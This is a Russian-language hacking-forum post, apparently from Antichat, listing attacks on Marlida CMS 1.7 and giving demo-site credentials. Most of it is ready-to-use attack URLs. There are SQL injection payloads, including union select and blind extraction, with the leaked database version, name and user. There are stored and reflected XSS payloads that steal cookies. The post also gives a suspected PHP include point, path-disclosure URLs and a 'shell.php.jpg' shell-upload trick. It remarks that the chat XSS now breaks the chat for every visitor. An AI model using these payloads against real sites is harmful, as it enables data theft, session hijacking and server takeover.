ANTICHAT - Marlida CMS

Marlida CMS платная (исходников нет)

Данная версия: ver.1.7

________________________________________________

ОФФ САЙТ:http://www.marlida.com/

ЛОГИН/ПАРОЛЬ ДЛЯ ВХОДА (Demo)

username: dexter

password: qdbgtinx

SQL INJECTION

Цитата:

Сообщение от None

http://demo.marlida.com/?d=games&s=alle&u=&rando=1694072435+OR+1=1

Цитата:

Сообщение от None

http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=4132'+union+s elect+1,2,3,4+and+'1'='1

Крутим как слепую

Цитата:

Сообщение от None

http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41'+and+ascii (substring((version()),14,1))=103+and+'null'='null

Код:

version: 4.0.25-Max-log 

db: d001f56f 

user: d001f56f@localhost

АКТИВНАЯ XSS

В ЧАТЕ

По адрессу http://demo.marlida.com/chat-alle (нужна авторизация)

кто туда теперь зайдет уже нечего там несможнт отписать постоянно вылетает xss.. так что капкан.

В ПРФИЛЕ

Hobbies: ">alert(document.cookie)

Beliebiges Feld: ТУТ XSS

Noch ein Feld: ТУТ XSS

+

"Marktplatz" выбераем "Kleinanzeigen" или "Immobilien" потом "Neus Inserat augeben"

Artikelbeschreibung: ТУТ XSS

ПАССИВНАЯ XSS

Цитата:

Сообщение от None

http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41">alert(doc ument.cookie)
http://demo.marlida.com/index.php?d=mitglieder&altervon=14&alterbis=99&ort =">alert(document.cookie)&ortdis=0
http://demo.marlida.com/index.php?d=forum&q=">alert(document.cookie)

Подозрение на php-include

Код:

http://demo.marlida.com/box.php?iframe=[INCLUDE]

Пути:

Код:

http://demo.marlida.com/box.php?box=login&d[]=fotos&s=65&u[]=edit

http://demo.marlida.com/index.php?d[]=

http://demo.marlida.com/index.php?d=jobs&s=list&q=&kat=&ort= ПРОБЕЛ &ortdis=10&alter=

Кто доработает все буду тока рад.

з.ы шелл заливается таким файлом "shell.php.jpg" ток толка нету от картинки так что можно забить..

http://demo.marlida.com/box.php?iframe=hotornot&u=neu